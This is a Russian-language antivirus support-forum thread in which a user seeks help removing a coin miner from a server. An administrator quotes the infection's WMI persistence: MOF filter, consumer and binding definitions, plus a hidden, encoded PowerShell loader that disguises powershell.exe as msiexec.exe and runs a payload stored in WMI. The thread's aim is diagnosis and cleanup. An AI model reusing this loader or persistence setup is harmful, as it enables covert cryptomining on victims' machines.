Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Центр вирусных исследований и аналитики Обнаружение вредоносного кода и ложные срабатывания

Win32/CoinMiner.DV , WMI/CommandLineEventConsumer/FsxxleFilter/powershell &base64_script

RSS
 
Роман Тимашков
Роман Тимашков
Пользователь
Сообщений: 5
Баллов: 2
Регистрация: 23.08.2018
Размещено 23.08.2018 14:39:36
Словил майнер на Сервере и не могу избавится: Оперативная память = msiexec.exe(16684);модифицированный Win32/CoinMiner.DV


TS-SERV_2018-08-23_12-05-46
Журнал Антивируса
Изменено: Роман Тимашков - 05.11.2018 12:20:13

Ответы

Пред. 1 2
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 28.09.2018 09:29:04
похоже, здесь используется запуск через WMI закодированного скрипта, возможно именно этот скрипт содержит запуск майнера, связанного с процессом msiexec

Цитата
Полное имя                  C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
Имя файла                   POWERSHELL.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
                           
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную]
File_Id                     4A5BC7F377000
Linker                      9.0
Размер                      473600 байт
Создан                      14.07.2009 в 03:49:07
Изменен                     14.07.2009 в 05:39:20
                           
TimeStamp                   13.07.2009 в 23:49:07
EntryPoint                  +
OS Version                  0.1
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                           
Оригинальное имя            PowerShell.EXE.MUI
Версия файла                6.1.7600.16385 (win7_rtm.090713-1255)
Описание                    Windows PowerShell
Производитель               Microsoft Corporation
                           
Доп. информация             на момент обновления списка
SHA1                        5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC
MD5                         852D67A27E454BD389FA7F02A8CBE23F
                           
Namespace                   \\.\root\subscription
Consumer_Name               FsxxleConsumer
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplatepowershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg­AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt­AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA­KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4­AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A­cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj­ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy­AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA­YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs­AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA­aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp­AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA­bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl­AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA­IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg­ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA­aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw­AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A­ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1­AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA­eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0­AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A­ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh­AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA­KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz­AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA­WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl­AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA­SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu­AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A­ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo­AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=
Filter_Name                 FsxxleFilter
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
Consumer = "CommandLineEventConsumer.Name="FsxxleConsumer"";
Filter = "__EventFilter.Name="FsxxleFilter"";
};

#MOF_Event#                
instance of __EventFilter
{
EventNamespace = "root\\cimv2";
Name = "FsxxleFilter";
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
CommandLineTemplate = "powershell -exec bypass -W 1 -E aQBmACAAKAAoAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAg­AG0AcwBpAGUAeABlAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFAAYQB0AGgAIAAt­AGUAcQAgACgAZABpAHIAIABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQA­KQAuAFYAYQBsAHUAZQArACcAXABQAGEAbgB0AGgAZQByAFwAbQBzAGkAZQB4­AGUAYwAuAGUAeABlACcAKQB7AGUAeABpAHQAfQBlAGwAcwBlAHsAUwB0AG8A­cAAtAFAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABtAHMAaQBlAHgAZQBj­ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMA­aQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBTAHQAbwBwAC0AUABy­AG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHgAbQByAGkAZwAgAC0ARgBvAHIA­YwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABs­AHkAQwBvAG4AdABpAG4AdQBlADsAYwBkACAAJABlAG4AdgA6AHcAaQBuAGQA­aQByAFwAUABhAG4AdABoAGUAcgA7AGMAbwBwAHkAIAAkAGUAbgB2ADoAdwBp­AG4AZABpAHIAXABzAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAA­bwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABl­AGwAbAAuAGUAeABlACAAbQBzAGkAZQB4AGUAYwAuAGUAeABlACAALQBlAGEA­IABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlADsAYwBvAHAAeQAg­ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgBcAFMAeQBzAFcATwBXADYANABcAFcA­aQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABw­AG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIABtAHMAaQBlAHgAZQBjAC4A­ZQB4AGUAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1­AGUAOwBzAHQAYQByAHQALQBwAHIAbwBjAGUAcwBzACAALgBcAG0AcwBpAGUA­eABlAGMALgBlAHgAZQAgAHsAJABXAG0AaQBOAGEAbQBlAD0AJwByAG8AbwB0­AFwAYwBpAG0AdgAyADoAVwBpAG4AMwAyAF8AUwB5AHMAQwBvAG0AbQBhAG4A­ZAAnADsAJABXAG0AaQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBh­AGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMA­KAAkAFcAbQBpAE4AYQBtAGUAKQA7ACQARgA9ACgAWwBXAG0AaQBDAGwAYQBz­AHMAXQAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMA­WwAnAEYAJwBdAC4AVgBhAGwAdQBlADsASQBFAFgAIAAoAFsAUwB5AHMAdABl­AG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkA­SQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBu­AHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A­ZwAoACQARgApACkAKQB9ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABo­AGkAZABkAGUAbgB9ADsAZQB4AGkAdAA=";
Name = "FsxxleConsumer";
};
[ Как создать образ автозапуска? ]
 
Пред. 1 2
Читают тему